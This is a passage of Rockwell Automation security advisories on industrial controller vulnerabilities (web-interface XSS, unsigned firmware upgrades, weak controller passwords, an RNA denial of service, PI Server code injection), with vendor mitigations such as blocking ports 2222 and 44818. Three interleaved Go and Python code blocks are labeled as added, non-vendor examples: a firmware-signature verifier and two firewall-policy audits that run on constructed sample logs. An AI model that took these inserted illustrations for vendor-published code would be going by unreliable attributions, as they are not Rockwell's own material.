  5. Block all traffic to the EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (e.g. a firewall, UTM devices, or other security appliance).
  6. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks.

Rockwell Automation is currently investigating additional long-term mitigation strategies that include, but are not limited to:

  1. Additional techniques to verify the authenticity of firmware updates to help reduce the likelihood of file tampering.
  2. Enhancements to the joint Rockwell Automation / Cisco Plantwide Reference Architecture that detail methods and recommendations which can further strengthen control system security.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

Reference http://www.ab.com/networks/architectures.html for comprehensive information about improving your control system to implement validated architectures designed to deliver layered-security and defense-in-depth.

PN391 | PN391 | ControlLogix 1756-ENBT/A Ethernet/IP Bridge - Potential Security Vulnerabilities
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
1756 ControlLogix I/O
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

Description

Potential Security Vulnerabilities

Rockwell Automation has identified three potential security vulnerabilities related to the web interface of the 1756-ENBT/A EtherNet/IP Bridge Module (the "Product"). Specifically, the risks include the following:

  • The potential for cross-site scripting, which could allow the Product to be used in a social engineering attack. An attacker could potentially craft a URL that looked as if it would take a user to the Product, but would instead execute script from a different location. A successful attack would require the attacker to transmit the crafted URL to a user with access to the web interface of the Product and to convince that user to open the URL.

  • The potential for web redirection, which could allow the Product to be used in a social engineering attack. An attacker could potentially craft a URL that looked as if it would take a user to the Product, but would actually direct the browser to a different location. A successful attack would require the attacker to transmit the crafted URL to a user with access to the web interface of the Product and to convince that user to open the URL.

  • The potential for exposure of some of the Product’s internal web page information. While this does not directly present a functional vulnerability, it does expose some internal information about the module.

Risk Mitigation

None of these issues results in the Product’s web pages or other Product functions being compromised or otherwise affected.

These potential security vulnerabilities are corrected in:

  • 1756-ENBT Version 4.008

  • 1756-EWEB Version 4.009

The best way to mitigate the risk associated with these issues is to employ the following in the design of network architecture:

  • Layered security.

  • Defense-in-depth methods.

Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

Additionally, to help mitigate the risk associated with the cross-site scripting potential vulnerability, certain web browsers and/or browser add-ons can be used. Internet Explorer Version 8 (which is currently in beta release) has cross-site scripting protection built-in. Additionally, the NoScript add-on for the FireFox browser can help prevent cross-site scripting attacks.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security/.

REFERENCES

http://www.kb.cert.org/vuls/id/124059

http://www.kb.cert.org/vuls/id/619499

http://www.kb.cert.org/vuls/id/882619

Industry Advisory - CIP: Rockwell Automation ControlLogix 1756-ENBT/A WebServer Vulnerabilities

Medium
PN402 | PN402 | ControlLogix 1756-ENBT/A EtherNet/IP Bridge - Potential Security Vulnerability
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
ControlLogix 1756-ENBT/A Ethernet/IP Bridge
CVSS Scores:
5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

ControlLogix 1756-ENBT/A EtherNet/IP Bridge - Potential Security Vulnerability

Description

Rockwell Automation has identified a potential security vulnerability in the firmware upgrade process employed by the ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module (the "Product"). Details of this potential vulnerability are as follows:

  • The potential for an unauthorized replacement of Rockwell Automation Product firmware with a corrupted firmware image that may render the Product inoperable and/or change its otherwise normal operation.

The results from an attacker’s successful exploitation of this vulnerability could include Denial of Service (DoS) to the Product and other components dependent on the Product. In an extreme case, successful exploitation could result in a potential misrepresentation of data or a repurposing of the Product for other malicious activities.

To help reduce the likelihood of exploitation and to help reduce associated security risk, Rockwell Automation recommends the following short-term mitigation strategies (Note: multiple strategies can be employed simultaneously):

  1. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks. Refer to Industrial Network Architectures for comprehensive information about implementing validated architectures designed to deliver these measures.
  2. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment and perform product firmware upgrades to that equipment.
  3. Block all traffic to the EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (E.g. a firewall, UTM devices, or other security appliance).

In addition to these short-term mitigation strategies, Rockwell Automation continues our investigation and evaluation of other long-term mitigation strategies that include, but are not limited to:

  1. Product and system-level techniques and functional enhancements to verify the authenticity of firmware updates and help reduce the likelihood of file tampering.
  2. Enhancements to the joint Rockwell Automation / Cisco Plantwide Reference Architecture that detail methods and recommendations which can further strengthen control system security.
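
The firmware-authenticity check that PN359 above describes (images that are digitally signed and that the device validates before applying an upgrade) and that this notice lists as a long-term mitigation for the ENBT upgrade path, as an added example that is not Rockwell’s or Cisco’s code and not the format their products use: a device-side verifier that accepts an image only if an Ed25519 signature under a pinned vendor public key validates over the whole container, and rejects tampered, wrongly keyed, truncated and unsigned images before any byte is written. The container layout and the signature scheme are assumptions for the example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Assumed container layout for this example (not a Rockwell or Cisco format):
//   4-byte magic | 4-byte big-endian payload length | payload | 64-byte Ed25519 signature
// The signature covers magic, length and payload, so nothing in the container
// can be altered without invalidating it.
var magic = []byte("FWv1")

const hdrLen = 8
const sigLen = ed25519.SignatureSize

var ErrRejected = errors.New("firmware image rejected")

// Pack is the vendor-side signing step: it wraps a payload and signs it with
// the vendor's private key, which never leaves the build environment.
func Pack(priv ed25519.PrivateKey, payload []byte) []byte {
	body := make([]byte, hdrLen, hdrLen+len(payload)+sigLen)
	copy(body, magic)
	binary.BigEndian.PutUint32(body[4:], uint32(len(payload)))
	body = append(body, payload...)
	return append(body, ed25519.Sign(priv, body)...)
}

// Verify is the device-side check run before any byte of the image is applied.
// The public key is pinned in the device; the image is accepted only if it
// parses, its declared length matches, and the signature validates.
func Verify(pub ed25519.PublicKey, image []byte) ([]byte, error) {
	if len(image) < hdrLen+sigLen || !bytes.Equal(image[:4], magic) {
		return nil, fmt.Errorf("%w: bad header", ErrRejected)
	}
	n := int(binary.BigEndian.Uint32(image[4:hdrLen]))
	if n != len(image)-hdrLen-sigLen {
		return nil, fmt.Errorf("%w: length mismatch", ErrRejected)
	}
	body, sig := image[:hdrLen+n], image[hdrLen+n:]
	if !ed25519.Verify(pub, body, sig) {
		return nil, fmt.Errorf("%w: signature invalid", ErrRejected)
	}
	return body[hdrLen:], nil
}

// Result records what the verifier did with each constructed image.
type Result struct {
	GenuineAccepted, TamperedRejected, WrongKeyRejected, UnsignedRejected, TruncatedRejected bool
}

// Demo signs a constructed payload and then feeds the verifier the genuine
// image plus four kinds of bad image.
func Demo() Result {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	otherPub, _, _ := ed25519.GenerateKey(rand.Reader) // someone else's key
	payload := []byte("constructed firmware payload, not a real image")
	img := Pack(priv, payload)

	var r Result
	out, err := Verify(pub, img)
	r.GenuineAccepted = err == nil && bytes.Equal(out, payload)

	tampered := append([]byte(nil), img...)
	tampered[hdrLen] ^= 0x01 // flip one bit in the payload
	_, err = Verify(pub, tampered)
	r.TamperedRejected = errors.Is(err, ErrRejected)

	_, err = Verify(otherPub, img) // signed, but not by the pinned vendor key
	r.WrongKeyRejected = errors.Is(err, ErrRejected)

	_, err = Verify(pub, payload) // raw payload with no container or signature
	r.UnsignedRejected = errors.Is(err, ErrRejected)

	_, err = Verify(pub, img[:len(img)-1]) // signature cut short
	r.TruncatedRejected = errors.Is(err, ErrRejected)
	return r
}

func main() {
	fmt.Printf("%+v\n", Demo())
}
```

The order of checks matters: structure and length are validated before the signature so that a malformed container is never passed to the verifier, and the payload is only returned once the signature over the complete container has been confirmed.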

For your information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at https://www.rockwellautomation.com/global/capabilities/industrial-security/overview.page.

Critical
PN560 | PN560 | Password Security Vulnerability in MicroLogix™ Controllers
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
MicroLogix Controllers
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

Password Security Vulnerability in MicroLogix™ Controllers

Description

Password Security Vulnerability in MicroLogix™ Controllers

Issue date December 18, 2009. Updated September 27, 2011.

Rockwell Automation has identified a security vulnerability in the programming and configuration client software authentication mechanism employed by the MicroLogix™ family of programmable controllers. This vulnerability is known to affect the MicroLogix family of controller platforms, including catalog numbers: 1761-Lxxxxx, 1762-Lxxxxx, 1763-Lxxxxx, 1764-Lxxxxx, 1766-Lxxxxx (the "Product").

Vulnerability Details:

The potential exists for a highly skilled, unauthorized person with specific tools, know-how and access to the Product or the control system communication link, to intercept and decipher the Product’s password and potentially make unauthorized changes to the Product’s operation.

--- Update begins here ---

Vulnerability Mitigation

The password mechanism used between RSLogix 500 software and MicroLogix controllers (1761-Lxxxxx, 1762-Lxxxxx, 1763-Lxxxxx, 1764-Lxxxxx, 1766-Lxxxxx) has been enhanced to mitigate risks relating to this specific vulnerability. Concerned customers are encouraged to upgrade RSLogix 500 software to version 8.4 or greater.

--- Update ends here ---

In addition to the recommended software upgrade, Rockwell Automation recommends customers take additional steps as outlined below to further reduce associated security risk from this vulnerability. These same steps can also serve as a checklist to verify available security capabilities are in place in a system’s configuration too (Note: when possible, multiple strategies should be employed simultaneously):

  1. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment.
  2. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks. Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.
  3. Block all traffic to the CSP, EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (e.g. a firewall, UTM devices, or other security appliance).
  4. Periodically and frequently change the Product’s password and obsolete previously used passwords to reduce exposure to threat from a Product password becoming known.
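
The port-blocking guideline repeated in this and the preceding advisories on this page (block TCP and UDP Port# 2222 and Port# 44818 to control devices from outside the Manufacturing Zone), as an added example that is not Rockwell’s code: a policy check that applies exactly that rule to connection records and reports which ones a boundary firewall would block. The zone CIDR, the record format and the log lines are constructed for the example.

```go
package main

import (
	"fmt"
	"net"
	"strconv"
	"strings"
)

// Flow is one connection attempt as it appears in a firewall or flow log,
// in the constructed format "proto src:port -> dst:port".
type Flow struct {
	Proto            string
	Src, Dst         net.IP
	SrcPort, DstPort int
}

// EtherNet/IP and CIP ports named in the advisory (TCP and UDP).
var cipPorts = map[int]bool{2222: true, 44818: true}

// Policy holds the Manufacturing Zone address ranges.
type Policy struct{ zone []*net.IPNet }

func NewPolicy(cidrs ...string) (*Policy, error) {
	p := &Policy{}
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			return nil, err
		}
		p.zone = append(p.zone, n)
	}
	return p, nil
}

func (p *Policy) inZone(ip net.IP) bool {
	for _, n := range p.zone {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// Allow implements the guideline: deny TCP/UDP traffic to a CIP port on a
// device inside the Manufacturing Zone when the source is outside the zone.
// Everything else is left to the rest of the ruleset (returns true).
func (p *Policy) Allow(f Flow) bool {
	proto := strings.ToLower(f.Proto)
	if proto != "tcp" && proto != "udp" {
		return true
	}
	return !(cipPorts[f.DstPort] && p.inZone(f.Dst) && !p.inZone(f.Src))
}

func splitAddr(s string) (net.IP, int, error) {
	host, port, err := net.SplitHostPort(s)
	if err != nil {
		return nil, 0, err
	}
	ip := net.ParseIP(host)
	if ip == nil {
		return nil, 0, fmt.Errorf("bad address %q", host)
	}
	n, err := strconv.Atoi(port)
	if err != nil || n < 0 || n > 65535 {
		return nil, 0, fmt.Errorf("bad port %q", port)
	}
	return ip, n, nil
}

// ParseFlow reads one record; malformed lines are rejected rather than guessed at.
func ParseFlow(line string) (Flow, error) {
	fields := strings.Fields(line)
	if len(fields) != 4 || fields[2] != "->" {
		return Flow{}, fmt.Errorf("malformed flow record: %q", line)
	}
	src, sport, err := splitAddr(fields[1])
	if err != nil {
		return Flow{}, err
	}
	dst, dport, err := splitAddr(fields[3])
	if err != nil {
		return Flow{}, err
	}
	return Flow{Proto: fields[0], Src: src, SrcPort: sport, Dst: dst, DstPort: dport}, nil
}

// Violations returns the records the policy would block.
func Violations(p *Policy, lines []string) ([]string, error) {
	var out []string
	for _, l := range lines {
		f, err := ParseFlow(l)
		if err != nil {
			return nil, err
		}
		if !p.Allow(f) {
			out = append(out, l)
		}
	}
	return out, nil
}

// SampleLog is constructed for this example: 10.10.5.0/24 is the assumed
// Manufacturing Zone and 10.20.0.0/16 the assumed business network.
var SampleLog = []string{
	"tcp 10.20.1.15:50321 -> 10.10.5.21:44818", // business -> zone, CIP: blocked
	"udp 10.20.1.15:2222 -> 10.10.5.21:2222",   // business -> zone, CIP I/O: blocked
	"tcp 10.10.5.30:51000 -> 10.10.5.21:44818", // inside the zone: not this rule's concern
	"tcp 10.20.1.15:50322 -> 10.10.5.21:443",   // business -> zone, not CIP: not this rule's concern
	"tcp 10.10.5.30:51001 -> 192.0.2.10:44818", // zone -> outside: egress, not covered by this rule
	"icmp 10.20.1.15:0 -> 10.10.5.21:0",        // not TCP/UDP
}

func Demo() ([]string, error) {
	p, err := NewPolicy("10.10.5.0/24")
	if err != nil {
		return nil, err
	}
	return Violations(p, SampleLog)
}

func main() {
	v, err := Demo()
	if err != nil {
		panic(err)
	}
	for _, l := range v {
		fmt.Println("BLOCK", l)
	}
}
```

Only the first two records match the rule. Running the same check over a real flow export before the rule is enforced is a quick way to find the business-network hosts that are currently talking CIP into the zone and would break when the block is applied.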

Rockwell Automation remains committed to making additional security enhancements to our products and systems in the future. For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

Critical
PN567 | PN567 | Client Software Authentication Security Vulnerability in PLC5® and SLC™ 5/0x Controllers
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
1747-L5x, 1785-Lx
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

Description

Issued February 2, 2010. Updated March 3, 2010 - Version 1.2

Updated March 19, 2013 (see below)

Rockwell Automation has identified a potential security vulnerability in the programming and configuration client software authentication mechanism employed by certain versions of the PLC5 and SLC family of programmable controllers. The particular vulnerability affects older versions of the following catalog numbers: 1785-Lx and 1747-L5x (the "Product"). Newer Products, programmed with current versions of RSLogix 5 or RSLogix 500, can enable specific security features such as FactoryTalk Security services to enhance security and reduce the risks associated with this vulnerability. When coupled with contemporary network design practices, the remaining risks linked to this vulnerability can be further reduced.

Details of this potential vulnerability to the affected Product are as follows:

The potential exists for a highly skilled, unauthorized person, with specific tools and know-how, to intercept communications between a Product and an authorized software client to gain access to the Product and interrupt its intended operation.

Customers who are concerned about unauthorized access to their Products can take the immediate steps outlined below to reduce the security risk associated with this potential vulnerability. These same steps can also serve as a checklist to verify that the available security capabilities are in place in a system’s configuration.

To help reduce the likelihood of exploitation and to help reduce associated security risk in the PLC5 and SLC family of controllers, Rockwell Automation recommends the following immediate mitigation strategies (Note: when possible, multiple strategies should be employed simultaneously):

1. When applicable, upgrade Product firmware to a version that includes enhanced security functionality compatible with Rockwell Automation’s FactoryTalk Security services. This functionality can be enabled via RSLogix 5 or RSLogix 500 software. Recommended firmware revisions are as follows:

a. The 1747-L5x firmware should be OS Series C FRN 10, or higher.

b. 1785-Lx processor firmware should be at or above the revisions in the following table. For each catalog number the minimum revisions are listed in the order the table gives them (Series A through F columns); series for which the table has no entry are omitted.

Enhanced:
  1785-L11B: R.2, U.2, L.2, K.2
  1785-L20B: R.2, U.2, L.2, K.2
  1785-L30B: S.2, U.2, L.2, K.2
  1785-L40B: S.2, U.2, L.2, K.2
  1785-L40L: S.2, U.2, L.2, K.2
  1785-L60B: S.2, U.2, L.2, K.2
  1785-L60L: S.2, U.2, L.2, K.2
  1785-L80B: U.2, L.2, K.2

Protected:
  1785-L26B: R.2, U.2, L.2, K.2
  1785-L46B: S.2, U.2, L.2, K.2
  1785-L46L: S.2, U.2
  1785-L86B: U.2, L.2, K.2

Ethernet:
  1785-L20E: U.2, L.2, K.2, A.2
  1785-L40E: U.2, L.2, K.2, A.2
  1785-L80E: U.2, L.2, K.2, A.2

ControlNet:
  1785-L20C15: U.2, L.2, K.2, E.2
  1785-L40C15: U.2, L.2, K.2, E.2
  1785-L46C15: K.2, E.2
  1785-L60C15: L.2
  1785-L80C15: L.2, K.2, E.2


2. Use the latest version of RSLogix 5 or RSLogix 500 configuration software and enable FactoryTalk Security services.

3. Disable where possible the capability to perform remote programming and configuration of the Product over a network to a controller by placing the controller’s key switch into RUN mode.

4. For PLC5 controllers, enable and configure "Passwords and Privileges" to restrict access to critical data and improve password security.

5. For SLC controllers, enable static protection via RSLogix 500 on all critical data table files to prevent any remote data changes to critical data.

<START UPDATE>

Added: 19 Mar 2013

Both RSLogix 500 and RSLogix Micro software version 8.40 were enhanced to introduce password encryption without any changes necessary to SLC and MicroLogix firmware. This implementation is compatible with all SLC and MicroLogix platforms.

In order to use this capability, a new "Encrypt Password" checkbox has been included in RSLogix 500/Micro version 8.40. This "Encrypt Password" checkbox is located on the Password tab of the Controller Properties page.

NOTE: Once an encrypted password is loaded into a controller, earlier versions of RSLogix 500 and RSLogix Micro will not be able to match the controller password.

For detailed information, refer to Publication 1766-RM001E-EN-P - May 2012, Program Password Protection

<END UPDATE>

6. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and control networks. Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

7. Block all traffic to the CSP, EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (e.g. a firewall, UTM devices, or other security appliance).

8. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment.

Rockwell Automation is committed to making additional security enhancements to our systems in the future.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

KCS Status

Released

PN676 | FactoryTalk RnaUtility.dll Vulnerability
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
FactoryTalk Services Platform
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

FactoryTalk RnaUtility.dll Vulnerability

Description

Publicly disclosed September 13, 2011 as RSLogix 5000 Denial of Service Vulnerability

Updated October 5, 2011

This advisory is a replacement and update to AID#: 456065

On September 13, 2011, Rockwell Automation was made aware of a potential vulnerability in RSLogix™ 5000 software that if successfully exploited, may result in a Denial of Service condition. Since the release of this information, we have been evaluating the specific vulnerability and associated risk.

We have confirmed the existence of this vulnerability in a particular software service employed by RSLogix 5000 and FactoryTalk®-branded Rockwell Automation software products.

Affected Products:

Product Description: Affected Versions
RSLogix 5000 software: Versions V17, V18 and V19
All FactoryTalk-branded software: CPR9 and CPR9-SR1 through SR4


Vulnerability Details and Impacts:

The particular vulnerability affects a software service in Rockwell Automation’s FactoryTalk Services Platform (FTSP). Although the installation of FTSP is optional, the specific service is also employed separately with a variety of Rockwell Automation software applications.

The Rockwell Automation Security Taskforce has determined that exploitation of this vulnerability can result in a potential Denial of Service (DoS) in RSLogix 5000 software. Specifically, it can result in RSLogix 5000 being unable to publish information to FactoryTalk Diagnostics and FactoryTalk AssetCentre. Additionally, exploitation can lead to a potential for a DoS and Denial of View (DoV) condition to other affected FactoryTalk-branded software. Such DoS and DoV conditions can prevent affected software from establishing communication or maintaining information exchange with servers and other control system devices.

There is no known possibility of malicious code injection and no known escalation of privilege on the target machine that results from successful exploitation of the vulnerability. Furthermore, there is no indication that exploitation will disrupt operation of a Rockwell Automation programmable controller or communications between RSLogix 5000 software and a Rockwell Automation programmable controller.

Vulnerability Mitigation:

A software patch for affected FactoryTalk Services Platform and RSLogix 5000 software has been released. Rockwell Automation recommends concerned customers apply this patch roll-up at their earliest convenience:

Recommended Mitigation

Product Description: Current Version: Recommendations
FactoryTalk Services Platform (FTSP): CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4: Apply patch roll-up AID#458689 (http://rockwellautomation.custhelp.com/app/answers/detail/a_id/458689)
RSLogix 5000: V17, V18, V19: Apply patch roll-up AID#458689 (http://rockwellautomation.custhelp.com/app/answers/detail/a_id/458689)

NOTE: FactoryTalk Services Platform CPR7 and earlier and RSLogix 5000 V16 and earlier are not affected by this vulnerability.

Other Mitigation Techniques:

We recognize the concerns our customers have relating to this matter. We continue to recommend that concerned customers remain vigilant and follow good security practices and system design.

Rockwell Automation, in collaboration with NitroSecurity, has released a specific SNORT® signature suitable for many popular Intrusion Detection Systems (IDS). Use of this signature can help further reduce the risk of successful remote exploitation of this vulnerability. This signature has been supplied to the QuickDraw SCADA IDS project, originally funded by the US Department of Energy, for inclusion in the QuickDraw signature database (http://www.digitalbond.com/tools/quickdraw/).

Rockwell Automation has evaluated Symantec Endpoint Protection (SEP) and validated a rule that blocks the known exploitation for SEP. We recommend that SEP definitions be kept up to date. For more information, refer to: http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=24527

In addition, the following security strategies are some techniques that will help reduce risk and enhance overall control system security:

1. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and control networks. Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

2. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment and perform product firmware upgrades to that equipment.

3. Configure firewall ingress/egress rules to block the following TCP ports to prevent traversal of RNA messages into/out of the ICS system: 1330, 1331, 1332, 4241, 4242, 4445, 4446, 5241, 6543, 9111, 60093, 49281.

4. Evaluate firewall configurations to ensure other appropriate traffic is blocked.

5. Use antivirus/antimalware and endpoint security solutions and verify that security definitions are kept up to date.
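The port lists in these advisories (TCP/UDP 2222 and 44818 for CSP/EtherNet/IP CIP traffic in the PLC5/SLC advisory above, and the FactoryTalk RNA TCP ports in item 3 here) are meant to be enforced at the Manufacturing Zone boundary, and the quickest way to find out whether a firewall actually does so is to audit its flow log. The following is an added example, not Rockwell Automation code: it reads key=value firewall records and reports every allowed flow on one of those ports that crosses the zone boundary in either direction. The zone prefix 10.10.0.0/16, the log format and the sample records are constructed for the example; only the port numbers come from the advisories.

```python
"""Audit firewall flow records for CIP and FactoryTalk RNA traffic crossing the Manufacturing Zone.

Added example, not Rockwell Automation code. Assumptions (constructed for this example):
  - the Manufacturing Zone is 10.10.0.0/16;
  - records are key=value lines in the format shown in SAMPLE_LOG.
Only the port numbers are taken from the advisories.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Ports the advisories say should not cross the zone boundary.
CIP_PORTS = {2222, 44818}                      # CSP / EtherNet/IP, TCP and UDP
RNA_PORTS = {1330, 1331, 1332, 4241, 4242, 4445, 4446,
             5241, 6543, 9111, 60093, 49281}   # FactoryTalk RNA, TCP only

MANUFACTURING_ZONE = ipaddress.ip_network("10.10.0.0/16")  # constructed assumption

_KV = re.compile(r"(\w+)=(\S+)")


@dataclass(frozen=True)
class Finding:
    timestamp: str
    proto: str
    src: str
    dst: str
    dport: int
    service: str     # "CIP" or "RNA"
    direction: str   # "ingress" (into the zone) or "egress" (out of the zone)


def classify(proto: str, dport: int) -> Optional[str]:
    """Name the advisory-listed service for proto/dport, or None if it is not one."""
    if dport in CIP_PORTS and proto in ("tcp", "udp"):
        return "CIP"
    if dport in RNA_PORTS and proto == "tcp":
        return "RNA"
    return None


def parse_line(line: str) -> Dict[str, str]:
    """Turn 'k=v k=v ...' into a dict; unrelated text yields an empty dict."""
    return dict(_KV.findall(line))


def audit(log_text: str, zone=MANUFACTURING_ZONE) -> List[Finding]:
    """Return allowed flows on CIP/RNA ports whose endpoints lie on opposite sides of the zone."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec.get("action") != "allow":
            continue  # denied flows are the firewall doing its job
        try:
            src = ipaddress.ip_address(rec["src"])
            dst = ipaddress.ip_address(rec["dst"])
            dport = int(rec["dport"])
        except (KeyError, ValueError):
            continue  # malformed record: skip it rather than abort the audit
        proto = rec.get("proto", "").lower()
        service = classify(proto, dport)
        if service is None:
            continue
        src_in, dst_in = src in zone, dst in zone
        if src_in == dst_in:
            continue  # intra-zone (or wholly external) traffic is not a boundary crossing
        direction = "ingress" if dst_in else "egress"
        findings.append(Finding(rec.get("ts", "?"), proto, str(src), str(dst),
                                dport, service, direction))
    return findings


# Constructed sample records; not real traffic.
SAMPLE_LOG = """\
ts=2020-02-11T10:00:01Z proto=tcp src=192.168.5.20 dst=10.10.1.7 dport=44818 action=allow
ts=2020-02-11T10:00:02Z proto=udp src=192.168.5.20 dst=10.10.1.7 dport=2222 action=deny
ts=2020-02-11T10:00:03Z proto=tcp src=10.10.1.7 dst=10.10.2.9 dport=44818 action=allow
ts=2020-02-11T10:00:04Z proto=tcp src=10.10.3.4 dst=172.16.9.9 dport=4241 action=allow
ts=2020-02-11T10:00:05Z proto=udp src=192.168.5.21 dst=10.10.1.8 dport=4241 action=allow
ts=2020-02-11T10:00:06Z proto=tcp src=192.168.5.22 dst=10.10.1.9 dport=443 action=allow
this line is not a flow record
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"{f.timestamp} {f.service} {f.direction}: {f.src} -> {f.dst}:{f.dport}/{f.proto}")
```

Of the six sample flows only two are reported: the EtherNet/IP connection allowed in from 192.168.5.20, and the RNA connection allowed out to 172.16.9.9. The denied flow, the intra-zone flow, UDP on an RNA port (RNA is TCP only), and HTTPS are all ignored. The port sets are plain data, so the same audit can be extended to other services an advisory names.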

For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

KCS Status

Released

Critical
PN889 | FT Historian SE OSIsoft PI Data Archive Vulnerabilities
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
FactoryTalk Historian SE
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

FT Historian SE OSIsoft PI Data Archive Vulnerabilities

Description

October 1st, 2015 - Version 1.0

On August 13th 2015, the Rockwell Automation Security Taskforce became aware of an advisory published by ICS-CERT (ICSA-15-225-01), which stated that OSIsoft disclosed and resolved 56 security vulnerabilities in their PI Server 2015 release. In addition to PI Server 2015, OSIsoft has also released PI Server 2012 SP1, which includes a subset of the vulnerabilities fixed in the 2015 version. OSIsoft is strongly recommending that users upgrade to the PI Server 2015 release.

FactoryTalk Historian SE includes the OSI PI Server 2012 product, including the PI Data Archive component, in the standard product image. As part of this process, Rockwell Automation has investigated the reported vulnerabilities and has concluded that FT Historian SE customers are likely vulnerable to the same set of vulnerabilities as the PI Server product. At the time of publication, no public exploits are known for these vulnerabilities.

Details relating to these vulnerabilities, the known affected platforms and recommended mitigations are contained herein.

AFFECTED PRODUCTS

  • FactoryTalk Historian SE (9518-HSEx), Versions 2.00.00, 2.10.00, 2.20.00, 3.01.00 and 4.00.00

Rockwell Automation is continuing to investigate these vulnerabilities and is actively determining future plans to address them, including incorporating the updated OSI PI Server into FactoryTalk Historian Server. This advisory will be updated when these plans are determined, as well as when updated software is available for customers to upgrade their systems. We recommend that customers apply the mitigations detailed below and subscribe to this article to receive the abovementioned notifications when updated.

VULNERABILITY DETAILS

According to both the ICS-CERT and OSIsoft disclosures, a portion of the highest-severity vulnerabilities may allow remote code injection by an attacker who sends a specially crafted sequence of packets to the PI Server contained in FT Historian SE.

To be successful, the attacker must have network connectivity to reach the server running FT Historian SE and be able to access port 5450 on that system. A successful exploit would allow an attacker to gain full privileges on the Windows system. With this level of access, an attacker could tamper with the system or product binaries, read and write arbitrary data, and/or tamper with user accounts on the system.

According to these disclosures, these vulnerabilities can also be used to create a Denial-of-Service (DoS) condition on the target server, rendering the FT Historian SE server unavailable to the automation system, and potentially cause either loss or corruption of the PI Server data.

RISK MITIGATIONS

  • Limit access to PI Server Port 5450, which reduces exposure to the highest-rated vulnerabilities.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  • Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 (https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.

ADDITIONAL LINKS

  • OSIsoft Releases Multiple Security Updates for the PI System (OSIsoft)
  • PI System Firewall Port Requirements (OSIsoft, Registration Required)
  • Rockwell Automation Security Advisory Index, Knowledgebase article KB:54102

KCS Status

Released

Critical
PN893 | MicroLogix 1100 and 1400 Controller Vulnerabilities
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
